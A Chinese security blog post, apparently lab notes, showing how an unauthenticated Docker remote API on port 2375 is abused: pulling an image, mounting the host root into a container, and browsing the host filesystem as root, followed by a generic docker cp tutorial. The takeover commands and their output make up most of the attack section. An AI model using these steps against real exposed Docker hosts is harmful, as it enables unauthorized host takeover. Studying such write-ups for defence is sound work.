目录
技能展示
文章
日记
时间线
项目展示
分类
标签
Android Bash Burp C++ CS CTF DLL劫持 Docker Fastjson Fastjson2 FNV-1a FreeCMS FRP GetShell GitHub IPv6 Java JNDI John JS加密 JS逆向 K8s Kafka Kali lama-cleaner Linux mitmproxy MSF MySQL Nim Nmap NPS Office OID Payload Phar PHP phpMyAdmin POP链 PWN Pyinstaller Python RCE RSA Shellcode SNMP SQL注入 SSH SSRF Ubuntu USB Web Webshell Web安全 Windows XSS YAML Zookeeper 主机探测 代码审计 伪协议 免杀 内网 内网穿透 加密 加解密 参数 反序列化 反弹shell 命令 哈希碰撞 图像处理 域渗透 字符串逃逸 容器 密码学 密码破解 提权 数据库 文件上传 日志分析 未授权访问 权限维持 汇总 流量分析 消息队列 溯源 漏洞 漏洞分析 漏洞利用 端口扫描 编译 网络管理 资产探测 跨平台 运维 进程隐藏 逆向
目录
目录
530 字
3 分钟
Docker远程未授权连接
Docker远程未授权连接
远程查看镜像

挂载目录到宿主机,写入定时任务反弹shell


获取宿主机权限

PS:远程控制
1C:\Users\q1303>docker -H tcp://10.1.239.160:2375 pull alpine2Using default tag: latest3latest: Pulling from library/alpine41f3e46996e29: Pull complete5Digest: sha256:56fa17d2a7e7f168a043a2712e63aed1f8543aeafdcee47c58dcffe38ed510996Status: Downloaded newer image for alpine:latest7docker.io/library/alpine:latest8
9C:\Users\q1303>docker -H tcp://10.1.239.160:2375 images10REPOSITORY TAG IMAGE ID CREATED SIZE11alpine latest b0c9d60fc5e3 11 days ago 7.83MB12vulfocus/vulfocus latest 8e55f85571c8 2 years ago 1.17GB13vulfocus/minio-cve_2021_21287 latest 0df28b7c9ea0 3 years ago 185MB1C:\Users\q1303>docker -H tcp://10.1.239.160:2375 run -v /:/mnt -it alpine2/ # whoami3root4/ # ifconfig5eth0 Link encap:Ethernet HWaddr 02:42:AC:11:00:026 inet addr:172.17.0.2 Bcast:172.17.255.255 Mask:255.255.0.07 UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:18 RX packets:37 errors:0 dropped:0 overruns:0 frame:09 TX packets:0 errors:0 dropped:0 overruns:0 carrier:010 collisions:0 txqueuelen:011 RX bytes:5370 (5.2 KiB) TX bytes:0 (0.0 B)12
13lo Link encap:Local Loopback14 inet addr:127.0.0.1 Mask:255.0.0.015 UP LOOPBACK RUNNING MTU:65536 Metric:116 RX packets:0 errors:0 dropped:0 overruns:0 frame:017 TX packets:0 errors:0 dropped:0 overruns:0 carrier:018 collisions:0 txqueuelen:100019 RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)20C:\Users\q1303>docker -H tcp://10.1.239.160:2375 run -v /:/mnt -it alpine21/ # whoami22root23/ # cd /mnt24/mnt # ls25bin dev lib libx32 mnt root snap sys var26boot etc lib32 lost+found opt run srv tmp27cdrom home lib64 media proc sbin swapfile usr28/mnt # cd home29/mnt/home # ls30dcj31/mnt/home # cd dcj32/mnt/home/dcj # ls33Clash.Verge_2.0.3-alpha_amd64.deb Public glibc-all-in-one34Desktop Pwngdb install.sh35Documents Templates pwndbg36Downloads Videos snap37Music crack38Pictures docker-desktop-amd64.deb39/mnt/home/dcj # cd /root40~ # ls41~ # pwd42/root43~ #docker传输文件
要将文件从 Docker 容器复制到本地,可以使用 docker cp 命令。以下是具体操作:
1# 容器 ➡️ 本地的操作2# 格式3docker cp <容器名或ID>:<容器内文件路径> <本地目标路径>4
5# 示例:将容器的 /app/data.log 复制到当前目录6docker cp my_container:/app/data.log .7
8# 本地 ➡️ 容器的操作(反向操作)9# 格式10docker cp <本地文件路径> <容器名或ID>:<容器内目标路径>11
12# 示例:将本地的 config.yml 复制到容器的 /app 目录13docker cp config.yml my_container:/app/实用技巧:
- 先用
docker ps查看容器名称/ID - 使用
-a参数可操作已停止的容器 - 推荐使用 volume 挂载实现持久化文件同步(更高效):
1docker run -v /本地/路径:/容器/路径 ...常见问题排查:
- 文件权限问题 → 尝试在命令前加
sudo - “No such container” → 检查容器名称是否正确
- 路径错误 → 先在容器内用
docker exec -it 容器名 ls 路径确认路径存在
部分信息可能已经过时
目录
技能展示
文章
日记
时间线
项目展示
分类
标签
Android Bash Burp C++ CS CTF DLL劫持 Docker Fastjson Fastjson2 FNV-1a FreeCMS FRP GetShell GitHub IPv6 Java JNDI John JS加密 JS逆向 K8s Kafka Kali lama-cleaner Linux mitmproxy MSF MySQL Nim Nmap NPS Office OID Payload Phar PHP phpMyAdmin POP链 PWN Pyinstaller Python RCE RSA Shellcode SNMP SQL注入 SSH SSRF Ubuntu USB Web Webshell Web安全 Windows XSS YAML Zookeeper 主机探测 代码审计 伪协议 免杀 内网 内网穿透 加密 加解密 参数 反序列化 反弹shell 命令 哈希碰撞 图像处理 域渗透 字符串逃逸 容器 密码学 密码破解 提权 数据库 文件上传 日志分析 未授权访问 权限维持 汇总 流量分析 消息队列 溯源 漏洞 漏洞分析 漏洞利用 端口扫描 编译 网络管理 资产探测 跨平台 运维 进程隐藏 逆向
目录